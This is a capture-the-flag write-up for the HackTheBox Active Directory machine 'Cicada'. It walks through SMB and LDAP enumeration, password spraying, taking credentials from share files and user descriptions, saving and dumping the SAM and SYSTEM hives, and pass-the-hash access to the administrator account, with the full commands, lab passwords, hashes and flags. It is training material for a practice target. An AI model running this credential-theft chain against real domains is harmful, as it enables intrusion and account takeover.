Cicada
AD box on HTB.
Enumeration:
Port Scanning:
We will start with nmap scanning:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.136.252
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 20:06 +03
Nmap scan report for 10.129.136.252 20:11:28 [245/535]
Host is up, received echo-reply ttl 127 (0.17s latency).
Scanned at 2025-09-10 20:06:08 +03 for 203s
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-11 00:07:06Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
| -----BEGIN CERTIFICATE-----
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-09-11T00:08:56+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-11T00:08:57+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
| -----BEGIN CERTIFICATE-----
<snipped>
|_-----END CERTIFICATE-----
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-11T00:08:56+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
| -----BEGIN CERTIFICATE-----
<snipped>
|_-----END CERTIFICATE-----
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
| -----BEGIN CERTIFICATE-----
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-09-11T00:08:57+00:00; +7h00m02s from scanner time.
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
65364/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
<snipped>
<snipped>So this is an active directory domain controller.
Lets get the domain and the hostname of the target domain controller:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec smb 10.129.136.252
SMB 10.129.136.252 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)Add it to the hosts file:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.136.252 CICADA-DC.cicada.htb cicada.htb CICADA-DCAlso I will sync the time with the target machine if we needed to interact with kerberos nearly:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ sudo ntpdate 10.129.136.252
2025-09-11 04:19:57.180875 (+0300) +25201.460337 +/- 0.074793 10.129.136.252 s1 no-leap
CLOCK: time stepped by 25201.460337We can view the available shares with guest session:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec smb cicada-dc.cicada.htb -u 'guest' -p '' --shares
SMB 10.129.136.252 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.136.252 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.136.252 445 CICADA-DC [*] Enumerated shares
SMB 10.129.136.252 445 CICADA-DC Share Permissions Remark
SMB 10.129.136.252 445 CICADA-DC ----- ----------- ------
SMB 10.129.136.252 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.136.252 445 CICADA-DC C$ Default share
SMB 10.129.136.252 445 CICADA-DC DEV
SMB 10.129.136.252 445 CICADA-DC HR READ
SMB 10.129.136.252 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.136.252 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.136.252 445 CICADA-DC SYSVOL Logon server shareWe can see that we have read permissions on the hr share.
Using impacket-smbclient we can enumerate that share to find what files it contains:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/smb]
└─$ impacket-smbclient cicada.htb/guest@10.129.136.252
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# shares
ADMIN$
C$
DEV
HR
IPC$
NETLOGON
SYSVOL
# use hr
# ls
drw-rw-rw- 0 Fri Mar 15 09:26:17 2024 .
drw-rw-rw- 0 Thu Mar 14 15:21:29 2024 ..
-rw-rw-rw- 1266 Wed Aug 28 20:31:48 2024 Notice from HR.txt
# get Notice from HR.txt
# exitOnly one file that is note from hr team:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/smb]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something uniq
ue and secure.
Your default password is: Cicada$M6Cor************
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special cha
racters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada CorpWe have a default password, we can dump the users with --rid-brute option of netexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec smb cicada-dc.cicada.htb -u 'guest' -p '' --rid-brute
SMB 10.129.136.252 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.136.252 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.136.252 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.136.252 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.136.252 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.136.252 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.136.252 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.129.136.252 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)Get the usernames only:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ cat temp.txt | grep SidTypeUser | awk '{print $6}' | cut -d '\' -f 2 > users.txt
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ cat users.txt
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscarsI will use kerbrute to perform password spraying:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ kerbrute passwordspray users.txt 'Cicada$M6Corpb*@Lp#nZp!8' --dc cicada-dc.cicada.htb -d cicada.htb
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/11/25 - Ronnie Flathers @ropnop
2025/09/11 03:25:19 > Using KDC(s):
2025/09/11 03:25:19 > cicada-dc.cicada.htb:88
2025/09/11 03:25:20 > [+] VALID LOGIN: michael.wrightson@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8
2025/09/11 03:25:20 > Done! Tested 9 logins (1 successes) in 1.390 secondsAnd we still have one user with the default password.
BloodHound:
Collect the domain data with bloodhound-python:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/bloodhound]
└─$ sudo bloodhound-python -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -ns 10.129.136.252 -d cicada.htb -dc cicada-dc.cicada.htb -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 9 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 50SStart bloodhound, and upload the data we collected to it:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/bloodhound]
└─$ sudo bloodhound
Starting neo4j
Neo4j is running at pid 20694
Bloodhound will start
IMPORTANT: It will take time, please wait...
opening http://127.0.0.1:8080
<snipped>I did not find anything useful as michael.wrightson, but we can find that if we compromised emily.oscars that is part of Backup Operators group, we can backup the sam database, and the system hive registry:
Lateral Movement to david.orelious:
I will try to get the users descriptions, because sometimes it contains some sensitive data, like user's password:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec ldap cicada-dc.cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M get-desc-users
LDAP 10.129.136.252 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
LDAP 10.129.136.252 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
GET-DESC... 10.129.136.252 389 CICADA-DC [+] Found following users:
GET-DESC... 10.129.136.252 389 CICADA-DC User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.129.136.252 389 CICADA-DC User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.129.136.252 389 CICADA-DC User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.129.136.252 389 CICADA-DC User: david.orelious description: Just in case I forget my password is aRt$Lp#7t*VQ!3So we will have another credentials.
Privilege Escalation:
Backup Operators:
Lets go back to the shares again, because there was one share that we did not have access to it:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec smb cicada-dc.cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.136.252 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.136.252 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.136.252 445 CICADA-DC [*] Enumerated shares
SMB 10.129.136.252 445 CICADA-DC Share Permissions Remark
SMB 10.129.136.252 445 CICADA-DC ----- ----------- ------
SMB 10.129.136.252 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.136.252 445 CICADA-DC C$ Default share
SMB 10.129.136.252 445 CICADA-DC DEV READ
SMB 10.129.136.252 445 CICADA-DC HR READ
SMB 10.129.136.252 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.136.252 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.136.252 445 CICADA-DC SYSVOL READ Logon server shareNow we have read permissions on the dev share as david.orelious, lets authenticate to that share and check if there was any interesting data:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/smb]
└─$ smbclient //10.129.136.252/dev -U 'david.orelious@cicada.htb%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 15:31:39 2024
.. D 0 Thu Mar 14 15:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 20:28:22 2024
4168447 blocks of size 4096. 478768 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \> exitWe will find out a backup script that contains plain-text password for emily.oscars user:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/smb]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"As shown in bloodhound enumeration we did that emily.oscars is member of Remote Management Users and Backup Operators groups, which allows us to authenticate via WinRM, and backup the sam and system hive registries:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ evil-winrm -i 10.129.136.252 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.Then we can download both of them using the download functionality of evil-winrm:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Info: Download successful!Now we can dump sam data with impacket-secretsdump:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ impacket-secretsdump -sam sam -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...If we checked the administrator hash with netexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec smb cicada-dc.cicada.htb -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
SMB 10.129.136.252 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.136.252 445 CICADA-DC [+] cicada.htb\administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)We will find that the local administrator has the same hash as the domain admin administrator.
So we can authenticate via WinRM for example:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ evil-winrm -i 10.129.136.252 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
CICADA-DC
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::324:625e:dac3:38b3
Link-local IPv6 Address . . . . . : fe80::97ab:bac3:c0d:e7ab%6
IPv4 Address. . . . . . . . . . . : 10.129.136.252
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%6
10.129.0.1And we can get the flags:
*Evil-WinRM* PS C:\Users> type C:\Users\Administrator\Desktop\root.txt
dd2ae5d8b143504347bbda76ca1bcc7c
*Evil-WinRM* PS C:\Users> type C:\Users\emily.oscars.cicada\Desktop\user.txt
397350d069970a4f85efa566ce714f88Last updated